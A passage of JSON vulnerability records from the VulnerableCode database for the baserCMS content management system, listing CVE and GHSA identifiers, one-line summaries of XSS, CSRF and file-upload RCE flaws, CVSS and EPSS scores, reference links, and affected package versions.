form.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN78151490/index.html","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN78151490/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10843","reference_id":"","reference_type":"","scores":[{"value":"0.0057","scoring_system":"epss","scoring_elements":"0.69014","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0057","scoring_system":"epss","scoring_elements":"0.68975","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-10843"},{"reference_url":"https://basercms.net/security/JVN78151490","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN78151490"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10843","reference_id":"CVE-2017-10843","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-10843"},{"reference_url":"https://github.com/advisories/GHSA-x73x-7gmx-w835","reference_id":"GHSA-x73x-7gmx-w835","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x73x-7gmx-w835"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/212595?format=json","purl":"pkg:composer/baserproject/basercms@4.0.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.5.1"},{"url":"http://public2.vulnerablecode.io/api/packages/54021?format=json","purl":"pkg:composer/baserproject/basercms@4.0.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-2u6y-aj6t-7fb1"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-6trr-5deb-yydm"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-9mf7-56fh-fyfk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-e4xa-jm9u-nked"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ga9u-uv9b-tydr"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-gsg3-fdmu-vqag"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-r4jc-22rq-d3cb"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-yesf-qxgy-3ygx"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zy68-bur9-1fck"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.0.6"}],"aliases":["CVE-2017-10843","GHSA-x73x-7gmx-w835"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-guvm-x5jc-mfgc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41362?format=json","vulnerability_id":"VCID-hpk4-a6tr-3ffe","summary":"baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.","references":[{"reference_url":"http://jvn.jp/en/jp/JVN14134801/index.html","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://jvn.jp/en/jp/JVN14134801/index.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39136","reference_id":"","reference_type":"","scores":[{"value":"0.0054","scoring_system":"epss","scoring_elements":"0.67989","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0054","scoring_system":"epss","scoring_elements":"0.6795","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-39136"},{"reference_url":"https://basercms.net/security/JVN_14134801","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN_14134801"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39136","reference_id":"CVE-2021-39136","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-39136"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/58790?format=json","purl":"pkg:composer/baserproject/basercms@4.5.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1"}],"aliases":["CVE-2021-39136","GHSA-hgjr-632x-qpp3"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/44713?format=json","vulnerability_id":"VCID-j37y-gws9-ake9","summary":"Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25654","reference_id":"","reference_type":"","scores":[{"value":"0.02083","scoring_system":"epss","scoring_elements":"0.84309","published_at":"2026-06-04T12:55:00Z"},{"value":"0.02083","scoring_system":"epss","scoring_elements":"0.84332","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-25654"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96"},{"reference_url":"https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359"},{"reference_url":"https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25654","reference_id":"CVE-2023-25654","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-25654"},{"reference_url":"https://github.com/advisories/GHSA-h4cc-fxpp-pgw9","reference_id":"GHSA-h4cc-fxpp-pgw9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-h4cc-fxpp-pgw9"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9","reference_id":"GHSA-h4cc-fxpp-pgw9","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64369?format=json","purl":"pkg:composer/baserproject/basercms@4.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5"}],"aliases":["CVE-2023-25654","GHSA-h4cc-fxpp-pgw9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46310?format=json","vulnerability_id":"VCID-jby7-s5ez-dqb3","summary":"Cross-Site Request Forgery (CSRF) in baserproject/basercms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43649","reference_id":"","reference_type":"","scores":[{"value":"0.00118","scoring_system":"epss","scoring_elements":"0.3025","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-43649"},{"reference_url":"https://basercms.net/security/JVN_99052047","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"}],"url":"https://basercms.net/security/JVN_99052047"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"}],"url":"https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43649","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-43649"},{"reference_url":"https://github.com/advisories/GHSA-fw9x-cqjq-7jx5","reference_id":"GHSA-fw9x-cqjq-7jx5","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-fw9x-cqjq-7jx5"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5","reference_id":"GHSA-fw9x-cqjq-7jx5","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67525?format=json","purl":"pkg:composer/baserproject/basercms@4.8.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"},{"url":"http://public2.vulnerablecode.io/api/packages/67580?format=json","purl":"pkg:composer/baserproject/basercms@5.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0"}],"aliases":["CVE-2023-43649","GHSA-fw9x-cqjq-7jx5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109461?format=json","vulnerability_id":"VCID-k575-suuf-7bhf","summary":"baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-41994","reference_id":"","reference_type":"","scores":[{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34314","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34412","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-41994"},{"reference_url":"https://basercms.net/security/JVN_53682526","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/"}],"url":"https://basercms.net/security/JVN_53682526"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://jvn.jp/en/jp/JVN53682526/index.html","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/"}],"url":"https://jvn.jp/en/jp/JVN53682526/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41994","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-41994"},{"reference_url":"https://github.com/advisories/GHSA-vxwf-79ch-f7f7","reference_id":"GHSA-vxwf-79ch-f7f7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vxwf-79ch-f7f7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146599?format=json","purl":"pkg:composer/baserproject/basercms@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"}],"aliases":["CVE-2022-41994","GHSA-vxwf-79ch-f7f7"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90792?format=json","vulnerability_id":"VCID-k5q